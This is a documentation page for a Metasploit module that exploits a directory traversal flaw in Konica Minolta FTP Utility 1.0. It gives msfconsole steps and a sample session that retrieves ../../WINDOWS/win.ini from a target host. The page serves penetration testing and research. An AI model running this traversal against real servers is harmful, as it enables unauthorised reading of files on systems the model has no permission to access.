ContextQMD
Back to Metasploit Framework

Konica Ftp Traversal

documentation/modules/auxiliary/scanner/ftp/konica_ftp_traversal.md

6.4.1311.2 KB
Original Source

Vulnerable Application

This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as ..//.

Link to Konica Minolta FTP Utility 1.00 software download Exploit-DB

Verification Steps

  1. Start msfconsole
  2. Do: use modules/auxiliary/scanner/ftp/konica_ftp_traversal
  3. Do: set RHOSTS [ip]
  4. Do: run

Scenarios

Konica Minolta FTP Utility 1.00 on Windows 7 (X64)

msf > use modules/auxiliary/scanner/ftp/konica_ftp_traversal
msf auxiliary(scanner/ftp/konica_ftp_traversal) > set RHOSTS 1.1.1.1
  RHOSTS => 1.1.1.1
set PATH ../../WINDOWS/win.ini
  PATH => ../../WINDOWS/win.ini
msf auxiliary(scanner/ftp/konica_ftp_traversal) > run
[+] 1.1.1.1:21      - Stored ../../WINDOWS/win.ini to /root/.msf4/loot/20191122042114_default_1.1.1.1_konica.ftp.data_003802.ini
[*] 1.1.1.1:21      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed